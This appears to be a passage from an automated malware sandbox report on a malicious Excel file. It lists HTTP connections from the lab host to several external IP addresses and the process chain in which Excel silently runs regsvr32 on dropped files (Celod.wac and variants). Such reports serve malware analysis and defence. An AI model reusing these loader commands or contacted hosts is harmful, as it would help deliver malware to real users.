    Oct 8, 2021 22:31:30.866389036 CEST4916880192.168.2.22190.14.37.165
    Oct 8, 2021 22:31:36.872767925 CEST4916880192.168.2.22190.14.37.165
    Oct 8, 2021 22:31:48.918448925 CEST4916980192.168.2.225.196.247.11
    Oct 8, 2021 22:31:51.928092003 CEST4916980192.168.2.225.196.247.11
    Oct 8, 2021 22:31:57.934708118 CEST4916980192.168.2.225.196.247.11
    Oct 8, 2021 22:32:09.950108051 CEST4917080192.168.2.225.196.247.11
    Oct 8, 2021 22:32:12.958657980 CEST4917080192.168.2.225.196.247.11
    Oct 8, 2021 22:32:18.965198040 CEST4917080192.168.2.225.196.247.11
    Oct 8, 2021 22:32:31.013303041 CEST4917180192.168.2.22188.119.113.3
    Oct 8, 2021 22:32:34.020548105 CEST4917180192.168.2.22188.119.113.3
    Oct 8, 2021 22:32:40.027221918 CEST4917180192.168.2.22188.119.113.3
    Oct 8, 2021 22:32:52.042889118 CEST4917280192.168.2.22188.119.113.3
    Oct 8, 2021 22:32:55.051162958 CEST4917280192.168.2.22188.119.113.3
    Oct 8, 2021 22:33:01.057859898 CEST4917280192.168.2.22188.119.113.3

    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:22:30:16
    Start date:08/10/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13fcb0000
    File size:28253536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:22:32:26
    Start date:08/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac
    Imagebase:0xff9c0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:22:32:26
    Start date:08/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac1
    Imagebase:0xff9c0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:22:32:26
    Start date:08/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac2
    Imagebase:0xff9c0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis

    Reset < >